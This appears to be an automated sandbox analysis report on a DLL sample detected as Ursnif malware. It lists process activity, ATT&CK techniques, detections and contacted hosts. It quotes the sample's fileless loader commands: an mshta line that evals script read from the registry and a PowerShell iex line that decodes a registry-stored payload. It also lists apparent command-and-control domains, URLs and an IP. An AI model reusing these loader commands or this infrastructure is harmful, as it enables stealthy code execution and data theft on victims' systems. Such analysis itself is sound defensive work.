              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2769
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2786
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DD8E78D
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress,0_2_6DD41F7C
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA2120 mov eax, dword ptr fs:[00000030h]0_2_6DDA2120
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDB227F mov eax, dword ptr fs:[00000030h]0_2_6DDB227F
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDCE801 mov eax, dword ptr fs:[00000030h]0_2_6DDCE801
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDCE337 push dword ptr fs:[00000030h]0_2_6DDCE337
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDCE730 mov eax, dword ptr fs:[00000030h]0_2_6DDCE730
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8DFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6DD8DFF3
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DD8E78D
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DDA18EF
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8EBB6 cpuid 0_2_6DD8EBB6
              Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6DD41E8A
              Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6DD41144
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04614454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04614454
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDB1C7E _free,GetTimeZoneInformation,_free,0_2_6DDB1C7E
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6DD41F10
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection12Deobfuscate/Decode Files or Information1Credential API Hooking3System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
              Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information2LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Rootkit4Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery45Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion21LSA SecretsSecurity Software Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection12Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 444316 Sample: 3a94.dll Startdate: 05/07/2021 Architecture: WINDOWS Score: 100 37 todo.faroin.at 2->37 39 resolver1.opendns.com 2->39 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 8 other signatures 2->55 8 iexplore.exe 1 55 2->8         started        10 loaddll32.exe 1 2->10         started        12 mshta.exe 19 2->12         started        signatures3 process4 signatures5 15 iexplore.exe 30 8->15         started        18 iexplore.exe 30 8->18         started        20 iexplore.exe 30 8->20         started        22 rundll32.exe 10->22         started        25 cmd.exe 1 10->25         started        27 rundll32.exe 10->27         started        31 2 other processes 10->31 59 Suspicious powershell command line found 12->59 29 powershell.exe 12->29         started        process6 dnsIp7 41 gtr.antoinfer.com 15->41 43 todo.faroin.at 165.232.183.49, 49717, 49718, 49719 ALLEGHENYHEALTHNETWORKUS United States 18->43 45 gtr.antoinfer.com 18->45 47 gtr.antoinfer.com 20->47 57 Writes registry values via WMI 22->57 33 rundll32.exe 25->33         started        35 conhost.exe 29->35         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              3a94.dll6%MetadefenderBrowse
              3a94.dll69%ReversingLabsWin32.Trojan.Midie

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.rundll32.exe.4190000.1.unpack100%AviraHEUR/AGEN.1108168Download File
              0.2.loaddll32.exe.1030000.0.unpack100%AviraHEUR/AGEN.1108168Download File
              6.2.rundll32.exe.52f0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
              4.2.rundll32.exe.4810000.1.unpack100%AviraHEUR/AGEN.1108168Download File
              3.2.rundll32.exe.4610000.1.unpack100%AviraHEUR/AGEN.1108168Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://gtr.antoinfer.com/favicon.ico0%Avira URL Cloudsafe
              http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy0%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://todo.faroin.at/6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw0%Avira URL Cloudsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrj0%Avira URL Cloudsafe
              http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob0%Avira URL Cloudsafe
              http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC0%Avira URL Cloudsafe
              http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCe0%Avira URL Cloudsafe
              http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              gtr.antoinfer.com
              		165.232.183.49
              		truetrue
                		unknown
                resolver1.opendns.com
                		208.67.222.222
                		truefalse
                  		high
                  todo.faroin.at
                  		165.232.183.49
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://gtr.antoinfer.com/favicon.icotrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMytrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://todo.faroin.at/6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLwtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfobtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrj{166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001D.00000002.492071617.000001F1AF661000.00000004.00000001.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmpfalse
                              		high
                              http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC{1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCe{166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr, ~DF6EAF3ABE87705E33.TMP.20.drfalse
                              • Avira URL Cloud: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              165.232.183.49
                              		gtr.antoinfer.comUnited States
                              		22255ALLEGHENYHEALTHNETWORKUStrue

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:444316
                              Start date:05.07.2021
                              Start time:16:50:20
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 50s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:3a94.dll
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:31
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDLL@24/16@7/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 44.7% (good quality ratio 42%)
                              • Quality average: 78.3%
                              • Quality standard deviation: 30.2%
                              HCA Information:
                              • Successful, ratio: 81%
                              • Number of executed functions: 90
                              • Number of non-executed functions: 169
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .dll
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 168.61.161.212, 131.253.33.200, 13.107.22.200, 20.50.102.62, 93.184.220.29, 23.211.6.115, 104.43.193.48, 23.211.4.86, 13.107.42.23, 13.107.5.88, 23.203.80.193, 80.67.82.235, 80.67.82.211, 152.199.19.161, 20.49.157.6, 40.112.88.60
